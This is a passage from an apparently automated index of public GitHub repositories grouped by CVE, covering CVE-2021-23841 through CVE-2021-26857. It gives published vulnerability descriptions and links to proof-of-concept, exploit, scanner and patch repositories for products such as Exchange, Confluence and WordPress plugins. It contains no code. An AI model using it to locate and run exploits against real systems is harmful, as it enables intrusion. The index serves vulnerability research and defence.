- [Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841](https://github.com/Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841)
- [Satheesh575555/Openssl_1_1_0_CVE-2021-23841](https://github.com/Satheesh575555/Openssl_1_1_0_CVE-2021-23841)
### CVE-2021-24027 (2021-04-06)
A cache configuration issue prior to WhatsApp for Android v2.21.4.18 and WhatsApp Business for Android v2.21.4.18 may have allowed a third party with access to the device’s external storage to read cached TLS material.
- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm)
### CVE-2021-24084 (2021-02-25)
Windows Mobile Device Management Information Disclosure Vulnerability
- [Jeromeyoung/CVE-2021-24084](https://github.com/Jeromeyoung/CVE-2021-24084)
- [exploitblizzard/WindowsMDM-LPE-0Day](https://github.com/exploitblizzard/WindowsMDM-LPE-0Day)
### CVE-2021-24085 (2021-02-25)
Microsoft Exchange Server Spoofing Vulnerability
- [sourceincite/CVE-2021-24085](https://github.com/sourceincite/CVE-2021-24085)
### CVE-2021-24086 (2021-02-25)
Windows TCP/IP Denial of Service Vulnerability
- [0vercl0k/CVE-2021-24086](https://github.com/0vercl0k/CVE-2021-24086)
- [lisinan988/CVE-2021-24086-exp](https://github.com/lisinan988/CVE-2021-24086-exp)
### CVE-2021-24096 (2021-02-25)
Windows Kernel Elevation of Privilege Vulnerability
- [FunPhishing/CVE-2021-24096](https://github.com/FunPhishing/CVE-2021-24096)
### CVE-2021-24098 (2021-02-25)
Windows Console Driver Denial of Service Vulnerability
- [waleedassar/CVE-2021-24098](https://github.com/waleedassar/CVE-2021-24098)
### CVE-2021-24145 (2021-03-18)
Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.
- [dnr6419/CVE-2021-24145](https://github.com/dnr6419/CVE-2021-24145)
### CVE-2021-24155 (2021-04-05)
The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.
- [0dayNinja/CVE-2021-24155.rb](https://github.com/0dayNinja/CVE-2021-24155.rb)
### CVE-2021-24160 (2021-04-05)
In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, subscribers could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site.
- [hnthuan1998/CVE-2021-24160](https://github.com/hnthuan1998/CVE-2021-24160)
- [hnthuan1998/Exploit-CVE-2021-24160](https://github.com/hnthuan1998/Exploit-CVE-2021-24160)
### CVE-2021-24356 (2021-06-14)
In the Simple 301 Redirects by BetterLinks WordPress plugin before 2.0.4, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites.
- [RandomRobbieBF/CVE-2021-24356](https://github.com/RandomRobbieBF/CVE-2021-24356)
### CVE-2021-24499 (2021-08-09)
The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
- [j4k0m/CVE-2021-24499](https://github.com/j4k0m/CVE-2021-24499)
- [hh-hunter/cve-2021-24499](https://github.com/hh-hunter/cve-2021-24499)
- [jytmX/CVE-2021-24499](https://github.com/jytmX/CVE-2021-24499)
### CVE-2021-24507 (2021-08-09)
The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues
- [RandomRobbieBF/CVE-2021-24507](https://github.com/RandomRobbieBF/CVE-2021-24507)
### CVE-2021-24545 (2021-10-11)
The WP HTML Author Bio WordPress plugin through 1.2.0 does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visit a post in the frontend made by such user. As a result, user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin view the related post/s.
- [V35HR4J/CVE-2021-24545](https://github.com/V35HR4J/CVE-2021-24545)
- [dnr6419/CVE-2021-24545](https://github.com/dnr6419/CVE-2021-24545)
### CVE-2021-24563 (2021-10-11)
The Frontend Uploader WordPress plugin through 1.3.2 does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
- [V35HR4J/CVE-2021-24563](https://github.com/V35HR4J/CVE-2021-24563)
### CVE-2021-24647 (2021-11-08)
The Registration Forms – User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
- [RandomRobbieBF/CVE-2021-24647](https://github.com/RandomRobbieBF/CVE-2021-24647)
### CVE-2021-24741 (2021-09-20)
The Support Board WordPress plugin before 3.3.4 does not escape multiple POST parameters (such as status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id) before using them in SQL statements, leading to SQL injections which are exploitable by unauthenticated users.
- [dldygnl/CVE-2021-24741](https://github.com/dldygnl/CVE-2021-24741)
### CVE-2021-24750 (2021-12-21)
The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks
- [fimtow/CVE-2021-24750](https://github.com/fimtow/CVE-2021-24750)
### CVE-2021-24807 (2021-11-08)
The Support Board WordPress plugin before 3.3.5 allows Authenticated (Agent+) users to perform Cross-Site Scripting attacks by placing a payload in the notes field, when an administrator or any authenticated user go to the chat the XSS will be automatically executed.
- [dldygnl/CVE-2021-24807](https://github.com/dldygnl/CVE-2021-24807)
### CVE-2021-24884 (2021-10-25)
The Formidable Form Builder WordPress plugin before 4.09.05 allows to inject certain HTML Tags like <audio>,<video>,<img>,<a> and<button>.This could allow an unauthenticated, remote attacker to exploit a HTML-injection byinjecting a malicous link. The HTML-injection may trick authenticated users to follow the link. If the Link gets clicked, Javascript code can be executed. The vulnerability is due to insufficient sanitization of the "data-frmverify" tag for links in the web-based entry inspection page of affected systems. A successful exploitation incomibantion with CSRF could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These actions include stealing the users account by changing their password or allowing attackers to submit their own code through an authenticated user resulting in Remote Code Execution. If an authenticated user who is able to edit Wordpress PHP Code in any kind, clicks the malicious link, PHP code can be edited.
- [S1lkys/CVE-2021-24884](https://github.com/S1lkys/CVE-2021-24884)
### CVE-2021-24917 (2021-12-06)
The WPS Hide Login WordPress plugin before 1.9.1 has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
- [dikalasenjadatang/CVE-2021-24917](https://github.com/dikalasenjadatang/CVE-2021-24917)
- [Cappricio-Securities/CVE-2021-24917](https://github.com/Cappricio-Securities/CVE-2021-24917)
### CVE-2021-24959 (2022-03-14)
The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.
- [RandomRobbieBF/CVE-2021-24959](https://github.com/RandomRobbieBF/CVE-2021-24959)
### CVE-2021-25003 (2022-03-14)
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE
- [biulove0x/CVE-2021-25003](https://github.com/biulove0x/CVE-2021-25003)
### CVE-2021-25032 (2022-01-10)
The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any new registered user with an administrator role.
- [RandomRobbieBF/CVE-2021-25032](https://github.com/RandomRobbieBF/CVE-2021-25032)
### CVE-2021-25076 (2022-01-24)
The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
- [0xAbbarhSF/CVE-2021-25076](https://github.com/0xAbbarhSF/CVE-2021-25076)
### CVE-2021-25094 (2022-04-25)
The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. By adding a PHP shell with a filename starting with a dot ".", this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.
- [darkpills/CVE-2021-25094-tatsu-preauth-rce](https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce)
- [TUANB4DUT/typehub-exploiter](https://github.com/TUANB4DUT/typehub-exploiter)
- [xdx57/CVE-2021-25094](https://github.com/xdx57/CVE-2021-25094)
- [experimentalcrow1/TypeHub-Exploiter](https://github.com/experimentalcrow1/TypeHub-Exploiter)
### CVE-2021-25162 (2021-03-30)
A remote execution of arbitrary commands vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.
- [twentybel0w/CVE-2021-25162](https://github.com/twentybel0w/CVE-2021-25162)
### CVE-2021-25253 (2021-04-13)
An improper access control vulnerability in Trend Micro Apex One, Trend Micro Apex One as a Service and OfficeScan XG SP1 on a resource used by the service could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
- [msd0pe-1/CVE-2021-25253](https://github.com/msd0pe-1/CVE-2021-25253)
### CVE-2021-25281 (2021-02-27)
An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
- [Immersive-Labs-Sec/CVE-2021-25281](https://github.com/Immersive-Labs-Sec/CVE-2021-25281)
### CVE-2021-25374 (2021-04-09)
An improper authorization vulnerability in Samsung Members "samsungrewards" scheme for deeplink in versions 2.4.83.9 in Android O(8.1) and below, and 3.9.00.9 in Android P(9.0) and above allows remote attackers to access a user data related with Samsung Account.
- [WithSecureLabs/CVE-2021-25374_Samsung-Account-Access](https://github.com/WithSecureLabs/CVE-2021-25374_Samsung-Account-Access)
### CVE-2021-25461 (2021-09-09)
An improper length check in APAService prior to SMR Sep-2021 Release 1 results in stack based Buffer Overflow.
- [bkojusner/CVE-2021-25461](https://github.com/bkojusner/CVE-2021-25461)
### CVE-2021-25641 (2021-05-29)
Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo versions before 2.7.8 or 2.6.9, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, aka, not following the server's instruction. This means that if a weak deserializer such as the Kryo and FST are somehow in code scope (e.g. if Kryo is somehow a part of a dependency), a remote unauthenticated attacker can tell the Provider to use the weak deserializer, and then proceed to exploit it.
- [Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept](https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept)
- [l0n3rs/CVE-2021-25641](https://github.com/l0n3rs/CVE-2021-25641)
### CVE-2021-25642 (2022-08-25)
ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (containing YARN-11126) if ZKConfigurationStore is used.
- [safe3s/CVE-2021-25642](https://github.com/safe3s/CVE-2021-25642)
### CVE-2021-25646 (2021-01-29)
Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
- [yaunsky/cve-2021-25646](https://github.com/yaunsky/cve-2021-25646)
- [lp008/CVE-2021-25646](https://github.com/lp008/CVE-2021-25646)
- [Ormicron/CVE-2021-25646-GUI](https://github.com/Ormicron/CVE-2021-25646-GUI)
- [Vulnmachines/Apache-Druid-CVE-2021-25646](https://github.com/Vulnmachines/Apache-Druid-CVE-2021-25646)
- [1n7erface/PocList](https://github.com/1n7erface/PocList)
- [givemefivw/CVE-2021-25646](https://github.com/givemefivw/CVE-2021-25646)
- [j2ekim/CVE-2021-25646](https://github.com/j2ekim/CVE-2021-25646)
- [luobai8/CVE-2021-25646-exp](https://github.com/luobai8/CVE-2021-25646-exp)
### CVE-2021-25679 (2021-04-20)
The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. NOTE: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched
- [3ndG4me/AdTran-Personal-Phone-Manager-Vulns](https://github.com/3ndG4me/AdTran-Personal-Phone-Manager-Vulns)
### CVE-2021-25735 (2021-09-06)
A security issue was discovered in kube-apiserver that could allow node updates to bypass a Validating Admission Webhook. Clusters are only affected by this vulnerability if they run a Validating Admission Webhook for Nodes that denies admission based at least partially on the old state of the Node object. Validating Admission Webhook does not observe some previous fields.
- [darryk10/CVE-2021-25735](https://github.com/darryk10/CVE-2021-25735)
### CVE-2021-25741 (2021-09-20)
A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem.
- [Betep0k/CVE-2021-25741](https://github.com/Betep0k/CVE-2021-25741)
- [cdxiaodong/CVE-2021-25741](https://github.com/cdxiaodong/CVE-2021-25741)
### CVE-2021-25790 (2021-07-23)
Multiple stored cross site scripting (XSS) vulnerabilities in the "Register" module of House Rental and Property Listing 1.0 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in all text fields except for Phone Number and Alternate Phone Number.
- [MrCraniums/CVE-2021-25790-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25790-Multiple-Stored-XSS)
### CVE-2021-25791 (2021-07-23)
Multiple stored cross site scripting (XSS) vulnerabilities in the "Update Profile" module of Online Doctor Appointment System 1.0 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads in the First Name, Last Name, and Address text fields.
- [MrCraniums/CVE-2021-25791-Multiple-Stored-XSS](https://github.com/MrCraniums/CVE-2021-25791-Multiple-Stored-XSS)
### CVE-2021-25801 (2021-07-26)
A buffer overflow vulnerability in the __Parse_indx component of VideoLAN VLC Media Player 3.0.11 allows attackers to cause an out-of-bounds read via a crafted .avi file.
- [DShankle/VLC_CVE-2021-25801_Analysis](https://github.com/DShankle/VLC_CVE-2021-25801_Analysis)
### CVE-2021-25804 (2021-07-26)
A NULL-pointer dereference in "Open" in avi.c of VideoLAN VLC Media Player 3.0.11 can a denial of service (DOS) in the application.
- [DShankle/VLC_CVE-2021-25804_Analysis](https://github.com/DShankle/VLC_CVE-2021-25804_Analysis)
### CVE-2021-26084 (2021-08-30)
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
- [crowsec-edtech/CVE-2021-26084](https://github.com/crowsec-edtech/CVE-2021-26084)
- [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC)
- [dinhbaouit/CVE-2021-26084](https://github.com/dinhbaouit/CVE-2021-26084)
- [JKme/CVE-2021-26084](https://github.com/JKme/CVE-2021-26084)
- [hev0x/CVE-2021-26084_Confluence](https://github.com/hev0x/CVE-2021-26084_Confluence)
- [prettyrecon/CVE-2021-26084_Confluence](https://github.com/prettyrecon/CVE-2021-26084_Confluence)
- [0xf4n9x/CVE-2021-26084](https://github.com/0xf4n9x/CVE-2021-26084)
- [Vulnmachines/Confluence_CVE-2021-26084](https://github.com/Vulnmachines/Confluence_CVE-2021-26084)
- [Osyanina/westone-CVE-2021-26084-scanner](https://github.com/Osyanina/westone-CVE-2021-26084-scanner)
- [CrackerCat/CVE-2021-26084](https://github.com/CrackerCat/CVE-2021-26084)
- [b1gw00d/CVE-2021-26084](https://github.com/b1gw00d/CVE-2021-26084)
- [taythebot/CVE-2021-26084](https://github.com/taythebot/CVE-2021-26084)
- [bcdannyboy/CVE-2021-26084_GoPOC](https://github.com/bcdannyboy/CVE-2021-26084_GoPOC)
- [smallpiggy/cve-2021-26084-confluence](https://github.com/smallpiggy/cve-2021-26084-confluence)
- [maskerTUI/CVE-2021-26084](https://github.com/maskerTUI/CVE-2021-26084)
- [BeRserKerSec/CVE-2021-26084-Nuclei-template](https://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template)
- [p0nymc1/CVE-2021-26084](https://github.com/p0nymc1/CVE-2021-26084)
- [Loneyers/CVE-2021-26084](https://github.com/Loneyers/CVE-2021-26084)
- [Xc1Ym/cve_2021_26084](https://github.com/Xc1Ym/cve_2021_26084)
- [wolf1892/confluence-rce-poc](https://github.com/wolf1892/confluence-rce-poc)
- [smadi0x86/CVE-2021-26084](https://github.com/smadi0x86/CVE-2021-26084)
- [kkin77/CVE-2021-26084-Confluence-OGNL](https://github.com/kkin77/CVE-2021-26084-Confluence-OGNL)
- [1ZRR4H/CVE-2021-26084](https://github.com/1ZRR4H/CVE-2021-26084)
- [GlennPegden2/cve-2021-26084-confluence](https://github.com/GlennPegden2/cve-2021-26084-confluence)
- [toowoxx/docker-confluence-patched](https://github.com/toowoxx/docker-confluence-patched)
- [nizar0x1f/CVE-2021-26084-patch-](https://github.com/nizar0x1f/CVE-2021-26084-patch-)
- [attacker-codeninja/CVE-2021-26084](https://github.com/attacker-codeninja/CVE-2021-26084)
- [ludy-dev/CVE-2021-26084_PoC](https://github.com/ludy-dev/CVE-2021-26084_PoC)
- [wdjcy/CVE-2021-26084](https://github.com/wdjcy/CVE-2021-26084)
- [orangmuda/CVE-2021-26084](https://github.com/orangmuda/CVE-2021-26084)
- [TheclaMcentire/CVE-2021-26084_Confluence](https://github.com/TheclaMcentire/CVE-2021-26084_Confluence)
- [Jun-5heng/CVE-2021-26084](https://github.com/Jun-5heng/CVE-2021-26084)
- [lleavesl/CVE-2021-26084](https://github.com/lleavesl/CVE-2021-26084)
- [quesodipesto/conflucheck](https://github.com/quesodipesto/conflucheck)
- [30579096/Confluence-CVE-2021-26084](https://github.com/30579096/Confluence-CVE-2021-26084)
- [ZZ-SOCMAP/CVE-2021-26084](https://github.com/ZZ-SOCMAP/CVE-2021-26084)
- [vpxuser/CVE-2021-26084-EXP](https://github.com/vpxuser/CVE-2021-26084-EXP)
- [nahcusira/CVE-2021-26084](https://github.com/nahcusira/CVE-2021-26084)
- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
### CVE-2021-26085 (2021-08-03)
Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.
- [ColdFusionX/CVE-2021-26085](https://github.com/ColdFusionX/CVE-2021-26085)
### CVE-2021-26086 (2021-08-16)
Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
- [Jeromeyoung/CVE-2021-26086](https://github.com/Jeromeyoung/CVE-2021-26086)
- [ColdFusionX/CVE-2021-26086](https://github.com/ColdFusionX/CVE-2021-26086)
### CVE-2021-26088 (2021-07-12)
An improper authentication vulnerability in FSSO Collector version 5.0.295 and below may allow an unauthenticated user to bypass a FSSO firewall policy and access the protected network via sending specifically crafted UDP login notification packets.
- [theogobinet/CVE-2021-26088](https://github.com/theogobinet/CVE-2021-26088)
### CVE-2021-26102
- [SleepyCofe/CVE-2021-26102](https://github.com/SleepyCofe/CVE-2021-26102)
### CVE-2021-26121
- [sourceincite/CVE-2021-26121](https://github.com/sourceincite/CVE-2021-26121)
### CVE-2021-26258 (2022-05-12)
Improper access control for the Intel(R) Killer(TM) Control Center software before version 2.4.3337.0 may allow an authorized user to potentially enable escalation of privilege via local access.
- [zwclose/CVE-2021-26258](https://github.com/zwclose/CVE-2021-26258)
### CVE-2021-26295 (2021-03-22)
Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
- [yumusb/CVE-2021-26295](https://github.com/yumusb/CVE-2021-26295)
- [rakjong/CVE-2021-26295-Apache-OFBiz](https://github.com/rakjong/CVE-2021-26295-Apache-OFBiz)
- [dskho/CVE-2021-26295](https://github.com/dskho/CVE-2021-26295)
- [coolyin001/CVE-2021-26295--](https://github.com/coolyin001/CVE-2021-26295--)
- [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc)
### CVE-2021-26411 (2021-03-11)
Internet Explorer Memory Corruption Vulnerability
- [CrackerCat/CVE-2021-26411](https://github.com/CrackerCat/CVE-2021-26411)
### CVE-2021-26414 (2021-06-08)
Windows DCOM Server Security Feature Bypass
- [Nels2/dcom_10036_Solver](https://github.com/Nels2/dcom_10036_Solver)
### CVE-2021-26415 (2021-04-13)
Windows Installer Elevation of Privilege Vulnerability
- [adenkiewicz/CVE-2021-26415](https://github.com/adenkiewicz/CVE-2021-26415)
### CVE-2021-26690 (2021-06-10)
Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Cookie header handled by mod_session can cause a NULL pointer dereference and crash, leading to a possible Denial Of Service
- [dja2TaqkGEEfA45/CVE-2021-26690](https://github.com/dja2TaqkGEEfA45/CVE-2021-26690)
### CVE-2021-26691 (2021-06-10)
In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server could cause a heap overflow
- [dja2TaqkGEEfA45/CVE-2021-26691](https://github.com/dja2TaqkGEEfA45/CVE-2021-26691)
### CVE-2021-26700 (2021-02-25)
Visual Studio Code npm-script Extension Remote Code Execution Vulnerability
- [jackadamson/CVE-2021-26700](https://github.com/jackadamson/CVE-2021-26700)
- [june-in-exile/CVE-2021-26700](https://github.com/june-in-exile/CVE-2021-26700)
### CVE-2021-26708 (2021-02-05)
A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support.
- [jordan9001/vsock_poc](https://github.com/jordan9001/vsock_poc)
- [azpema/CVE-2021-26708](https://github.com/azpema/CVE-2021-26708)
### CVE-2021-26714 (2021-03-29)
The Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4 could allow a user to access restricted files and folders due to insufficient access control. A successful exploit could allow an attacker to view and modify application data via Directory Traversal.
- [PwCNO-CTO/CVE-2021-26714](https://github.com/PwCNO-CTO/CVE-2021-26714)
### CVE-2021-26814 (2021-03-06)
Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.
- [WickdDavid/CVE-2021-26814](https://github.com/WickdDavid/CVE-2021-26814)
- [CYS4srl/CVE-2021-26814](https://github.com/CYS4srl/CVE-2021-26814)
- [paolorabbito/Internet-Security-Project---CVE-2021-26814](https://github.com/paolorabbito/Internet-Security-Project---CVE-2021-26814)
### CVE-2021-26828 (2021-06-11)
OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm.
- [hev0x/CVE-2021-26828_ScadaBR_RCE](https://github.com/hev0x/CVE-2021-26828_ScadaBR_RCE)
### CVE-2021-26832 (2021-04-14)
Cross Site Scripting (XSS) in the "Reset Password" page form of Priority Enterprise Management System v8.00 allows attackers to execute javascript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site.
- [NagliNagli/CVE-2021-26832](https://github.com/NagliNagli/CVE-2021-26832)
### CVE-2021-26855 (2021-03-02)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [sgnls/exchange-0days-202103](https://github.com/sgnls/exchange-0days-202103)
- [soteria-security/HAFNIUM-IOC](https://github.com/soteria-security/HAFNIUM-IOC)
- [cert-lv/exchange_webshell_detection](https://github.com/cert-lv/exchange_webshell_detection)
- [conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855](https://github.com/conjojo/Microsoft_Exchange_Server_SSRF_CVE-2021-26855)
- [pussycat0x/CVE-2021-26855-SSRF](https://github.com/pussycat0x/CVE-2021-26855-SSRF)
- [La3B0z/CVE-2021-26855-SSRF-Exchange](https://github.com/La3B0z/CVE-2021-26855-SSRF-Exchange)
- [mekhalleh/exchange_proxylogon](https://github.com/mekhalleh/exchange_proxylogon)
- [Yt1g3r/CVE-2021-26855_SSRF](https://github.com/Yt1g3r/CVE-2021-26855_SSRF)
- [hackerxj007/CVE-2021-26855](https://github.com/hackerxj007/CVE-2021-26855)
- [dwisiswant0/proxylogscan](https://github.com/dwisiswant0/proxylogscan)
- [mauricelambert/ExchangeWeaknessTest](https://github.com/mauricelambert/ExchangeWeaknessTest)
- [DCScoder/Exchange_IOC_Hunter](https://github.com/DCScoder/Exchange_IOC_Hunter)
- [srvaccount/CVE-2021-26855-PoC](https://github.com/srvaccount/CVE-2021-26855-PoC)
- [h4x0r-dz/CVE-2021-26855](https://github.com/h4x0r-dz/CVE-2021-26855)
- [alt3kx/CVE-2021-26855_PoC](https://github.com/alt3kx/CVE-2021-26855_PoC)
- [r0xdeadbeef/CVE-2021-26855](https://github.com/r0xdeadbeef/CVE-2021-26855)
- [hackerschoice/CVE-2021-26855](https://github.com/hackerschoice/CVE-2021-26855)
- [SCS-Labs/HAFNIUM-Microsoft-Exchange-0day](https://github.com/SCS-Labs/HAFNIUM-Microsoft-Exchange-0day)
- [KotSec/CVE-2021-26855-Scanner](https://github.com/KotSec/CVE-2021-26855-Scanner)
- [hakivvi/proxylogon](https://github.com/hakivvi/proxylogon)
- [ZephrFish/Exch-CVE-2021-26855](https://github.com/ZephrFish/Exch-CVE-2021-26855)
- [mil1200/ProxyLogon-CVE-2021-26855](https://github.com/mil1200/ProxyLogon-CVE-2021-26855)
- [evilashz/ExchangeSSRFtoRCEExploit](https://github.com/evilashz/ExchangeSSRFtoRCEExploit)
- [ZephrFish/Exch-CVE-2021-26855_Priv](https://github.com/ZephrFish/Exch-CVE-2021-26855_Priv)
- [Mr-xn/CVE-2021-26855-d](https://github.com/Mr-xn/CVE-2021-26855-d)
- [RickGeex/ProxyLogon](https://github.com/RickGeex/ProxyLogon)
- [Immersive-Labs-Sec/ProxyLogon](https://github.com/Immersive-Labs-Sec/ProxyLogon)
- [shacojx/Scan-Vuln-CVE-2021-26855](https://github.com/shacojx/Scan-Vuln-CVE-2021-26855)
- [TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit](https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit)
- [p0wershe11/ProxyLogon](https://github.com/p0wershe11/ProxyLogon)
- [shacojx/CVE-2021-26855-exploit-Exchange](https://github.com/shacojx/CVE-2021-26855-exploit-Exchange)
- [catmandx/CVE-2021-26855-Exchange-RCE](https://github.com/catmandx/CVE-2021-26855-Exchange-RCE)
- [hictf/CVE-2021-26855-CVE-2021-27065](https://github.com/hictf/CVE-2021-26855-CVE-2021-27065)
- [praetorian-inc/proxylogon-exploit](https://github.com/praetorian-inc/proxylogon-exploit)
- [Flangvik/SharpProxyLogon](https://github.com/Flangvik/SharpProxyLogon)
- [hosch3n/ProxyVulns](https://github.com/hosch3n/ProxyVulns)
- [Nick-Yin12/106362522](https://github.com/Nick-Yin12/106362522)
- [yaoxiaoangry3/Flangvik](https://github.com/yaoxiaoangry3/Flangvik)
- [thau0x01/poc_proxylogon](https://github.com/thau0x01/poc_proxylogon)
- [1342486672/Flangvik](https://github.com/1342486672/Flangvik)
- [TheDudeD6/ExchangeSmash](https://github.com/TheDudeD6/ExchangeSmash)
- [kh4sh3i/ProxyLogon](https://github.com/kh4sh3i/ProxyLogon)
- [ssrsec/Microsoft-Exchange-RCE](https://github.com/ssrsec/Microsoft-Exchange-RCE)
- [glen-pearson/ProxyLogon-CVE-2021-26855](https://github.com/glen-pearson/ProxyLogon-CVE-2021-26855)
- [MacAsure/cve-2021-26855](https://github.com/MacAsure/cve-2021-26855)
- [timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt](https://github.com/timb-machine-mirrors/testanull-CVE-2021-26855_read_poc.txt)
### CVE-2021-26856
- [avi8892/CVE-2021-26856](https://github.com/avi8892/CVE-2021-26856)
### CVE-2021-26857 (2021-03-02)
Microsoft Exchange Server Remote Code Execution Vulnerability
